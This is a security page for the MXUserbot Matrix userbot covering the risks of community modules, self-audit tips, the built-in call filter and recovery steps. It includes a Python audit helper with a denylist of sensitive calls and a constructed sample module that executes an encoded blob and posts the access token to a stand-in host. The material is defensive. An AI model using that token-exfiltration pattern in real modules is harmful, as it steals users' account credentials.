The security of running user (community) modules in MXUserbot relies on two core principles:
As a user of the userbot, YOU must clearly understand: the core does not have multi-layered protection against malicious scripts, nor does it run modules in a separate isolated environment (sandbox).
This is quite difficult for a single developer on the team to implement, so it is what it is :)
Therefore, YOU accept full responsibility for installing modules that do NOT come from the system repository. The system repository is considered trusted by default, as all modules there undergo strict review and testing before being added to the database.
- Self-Audit: YOU must independently check the source code of each community module for malicious functions.
- How to check code if you are not a programmer:
  - Look out for third-party links in the code (sending data to unknown websites).
  - Watch out for strange, unreadable character sets (obfuscation) or hidden commands.
  - In doubt? Drop the module's code into an AI with a request to analyze it for vulnerabilities, or visit our SUPPORT room.
- What to do if a threat is found: If you notice that a module contains malicious code — DO NOT INSTALL IT UNDER ANY CIRCUMSTANCES! Immediately report the malicious module or repository to our support room.
Although the bot does not provide 100% protection, it features a built-in system that filters out critically unsafe calls, such as:
- Accessing other users' data in the database;
- Forcing an account logout;
- Retrieving the access token;
- Interacting directly with cryptography;
- Retrieving the list of authorized devices and other critical API methods.
How it works: If the core detects an unsafe call in the code during module loading, the bot will simply refuse to run that module. The malicious script will be isolated before it can even start.
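A rough helper for the self-audit checks (third-party links, obfuscation) and the blocked call categories described above, as an added example that is not MXUserbot's own filter. It assumes community modules are Python source files; the names in `SENSITIVE_ATTRS`, the `bot.*` calls and the sample module are constructed for illustration.

```python
import ast
import re

# Assumed names (not MXUserbot's real denylist): attributes that map to the
# blocked categories listed on this page.
SENSITIVE_ATTRS = {"access_token", "logout", "logout_all", "devices", "olm"}
DYNAMIC_CALLS = {"eval", "exec", "compile", "__import__", "getattr"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{80,}$")  # long encoded-looking string


def audit_module(source: str) -> list[tuple[int, str, str]]:
    """Return sorted (line, kind, detail) findings for one module's source."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:  # code that will not parse deserves a manual look
        return [(exc.lineno or 0, "unparseable", exc.msg)]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr in SENSITIVE_ATTRS:
            findings.append((node.lineno, "sensitive-attr", node.attr))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in DYNAMIC_CALLS):
            findings.append((node.lineno, "dynamic-call", node.func.id))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.append((node.lineno, "url", url))
            if BLOB_RE.match(node.value):
                findings.append((node.lineno, "encoded-blob", f"{len(node.value)} chars"))
    return sorted(findings)


# Constructed sample module, not taken from any real repository.
SAMPLE = '''
import base64
async def hello(bot, event):
    await bot.send_text(event.room_id, "hi")
async def sync_hook(bot, event):
    token = bot.client.access_token
    exec(base64.b64decode("{blob}"))
    await bot.http.post("https://collector.example.invalid/in", data=token)
'''.format(blob="QUJD" * 25)

if __name__ == "__main__":
    for line, kind, detail in audit_module(SAMPLE):
        print(f"line {line}: {kind}: {detail}")
```

An empty result does not prove a module is safe, since names built from strings at runtime evade this kind of static check. Treat each finding as a line to read closely before installing.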
If you suspect that you have loaded a malicious script and it managed to run (or bypassed the built-in blocks), take immediate action:
- Stop the bot: Shut down the userbot process IMMEDIATELY (or stop its Docker container).
- Revoke sessions: Open your Matrix client settings (e.g., Element), navigate to the "Sessions / Devices" section, and terminate all suspicious or new sessions to revoke access tokens.
- Remove the traces: Physically delete the malicious module file from the bot's folder.
- Secure your account: Change your Matrix account password for maximum security.